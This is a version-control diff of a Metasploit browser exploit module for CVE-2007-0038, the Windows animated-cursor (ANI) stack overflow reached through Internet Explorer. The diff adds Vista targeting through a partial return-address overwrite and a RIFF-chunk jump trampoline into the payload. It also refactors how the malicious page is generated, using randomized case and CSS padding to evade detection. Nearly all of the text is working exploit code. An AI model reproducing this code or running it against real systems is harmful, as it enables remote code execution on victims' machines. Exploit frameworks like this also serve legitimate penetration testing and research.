fixes for Vista, brute forcing
git-svn-id: file:///home/svn/framework3/trunk@4598 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
86f4bfd514
commit
6cfab21bcb
|
@ -96,18 +96,20 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
#
|
||||
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
|
||||
# of the RIFF itself.
|
||||
# of the RIFF chunk itself. The length field of the RIFF chunk
|
||||
# tag contains a short jump into an embedded riff chunk that
|
||||
# makes a long relative jump into the actual payload.
|
||||
#
|
||||
[ 'Windows Vista user32.dll 6.0.6000.16386',
|
||||
{
|
||||
'Ret' => 0x700b,
|
||||
'Len' => 2,
|
||||
|
||||
# The RIFF magic bytes and the size of the riff file are
|
||||
# executed which then bounce through.
|
||||
#
|
||||
# 1. Partial overwrite return with the address of a jmp dword [ebx]
|
||||
# 2. Executes the first few bytes of the RIFF chunk and then
|
||||
# does a jmp $+0x16
|
||||
# 3. Executes a relative jump to the start of the payload
|
||||
# itself.
|
||||
[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
|
||||
# On Vista, the pages that contain the RIFF are read-only.
|
||||
# In-place decoders cannot be used.
|
||||
'EncoderType' => Msf::Encoder::Type::Raw
|
||||
}
|
||||
]
|
||||
|
||||
],
|
||||
'DisclosureDate' => 'Mar 28 2007',
|
||||
|
@ -145,28 +147,14 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
mytargs = (target.name =~ /All Targets/) ? targets : [target]
|
||||
|
||||
mytargs.each_index do |i|
|
||||
if target.name =~ /All Targets/
|
||||
targets.each_index { |i|
|
||||
next if not targets[i].ret
|
||||
|
||||
next if not mytargs[i].ret
|
||||
|
||||
html << "<div style='" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("cursor") +
|
||||
generate_css_padding() +
|
||||
":" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("url(") +
|
||||
generate_css_padding() +
|
||||
'"' +
|
||||
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
||||
"?#{rand_text_alpha(rand(12)+1)}=#{i}" +
|
||||
'"' +
|
||||
generate_css_padding() +
|
||||
");" +
|
||||
generate_css_padding() +
|
||||
"'>" +
|
||||
generate_padding() +
|
||||
"</div>"
|
||||
html << generate_div(gext, i)
|
||||
}
|
||||
else
|
||||
html << generate_div(gext, target_index)
|
||||
end
|
||||
|
||||
html << "</body></html>"
|
||||
|
@ -191,6 +179,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
handler(cli)
|
||||
end
|
||||
|
||||
def generate_div(gext, targ)
|
||||
"<div style='" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("cursor") +
|
||||
generate_css_padding() +
|
||||
":" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("url(") +
|
||||
generate_css_padding() +
|
||||
'"' +
|
||||
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
||||
"?#{rand_text_alpha(rand(12)+1)}=#{targ}" +
|
||||
'"' +
|
||||
generate_css_padding() +
|
||||
");" +
|
||||
generate_css_padding() +
|
||||
"'>" +
|
||||
generate_padding() +
|
||||
"</div>"
|
||||
end
|
||||
|
||||
def generate_ani(payload, target)
|
||||
|
||||
# Build the first ANI header
|
||||
|
@ -208,10 +217,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
if (target.name =~ /Vista/)
|
||||
# Vista has ebp=80, eip=84
|
||||
anih_b = anih_a + rand_text(84-anih_a.length)
|
||||
anih_b = rand_text(84)
|
||||
|
||||
# Overwrite locals with invalid pointers
|
||||
anih_b[68, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3
|
||||
# Overwrite local counter variable and pointers
|
||||
anih_b[68, 12] = [0].pack('V') * 3
|
||||
else
|
||||
# XP/2K has ebp=76 and eip=80
|
||||
anih_b = anih_a + rand_text(80-anih_a.length)
|
||||
|
@ -226,6 +235,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
# Begin the ANI chunk
|
||||
riff = "ACON"
|
||||
|
||||
# Calculate the data offset for the trampoline chunk and add
|
||||
# the trampoline chunk if we're attacking Vista
|
||||
if target.name =~ /Vista/
|
||||
trampoline_doffset = riff.length + 8
|
||||
|
||||
|
|
Loading…
Reference in New Issue